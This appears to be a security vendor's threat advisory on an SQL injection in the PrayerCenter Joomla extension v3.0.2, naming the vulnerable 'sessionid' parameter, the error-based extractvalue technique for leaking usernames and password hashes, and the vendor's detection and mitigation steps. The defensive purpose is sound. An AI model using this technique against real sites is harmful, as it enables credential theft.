05/04/18: Joomla (CMS) PrayerCenter confirm() SQLi

Threat Summary

Overview

The PrayerCenter Joomla extension v3.0.2 contains a SQL injection vulnerability as a result of unsanitized user input being used in the construction of a SQL query string. The attack abuses the ‘extractvalue’ SQL function to induce an XPath syntax error string which is displayed on the Joomla error page that is returned to the user. The error string used to exfiltrate sensitive information from the database can result in the theft of sensitive information, such as usernames and password hashes.

Exploitation

Stages

An unauthenticated remote user submits a GET request containing a numeric ‘id’ parameter and SQLi syntax in the ‘sessionid’ parameter.

The server constructs and executes a SQL query using the injected syntax, which triggers an XPath error.

Prerequisites

To successfully extract user credentials, the attacker would need to know the table prefix in use or leverage the same SQLi attack to determine the prefix using brute force. Additionally, as the most recent version of the extension is v3.0.2, it is safe to assume that any Joomla site running it is vulnerable.

Alert Logic Coverage

Alert Logic® has evaluated its customer base for exposure to the exploit and has developed signatures for mitigating the threat depending on the security service in place.

The Network-Based Intrusion Detection System (IDS) has been updated with the new signatures for this exploit when detected via Alert Logic Threat Manager™. If this signature is detected, an incident is generated in the Alert Logic console.

Recommendations for Mitigation

Upgrade to a non-vulnerable version of the plugin if available. Otherwise, investigate alternative plugins until a patch is released.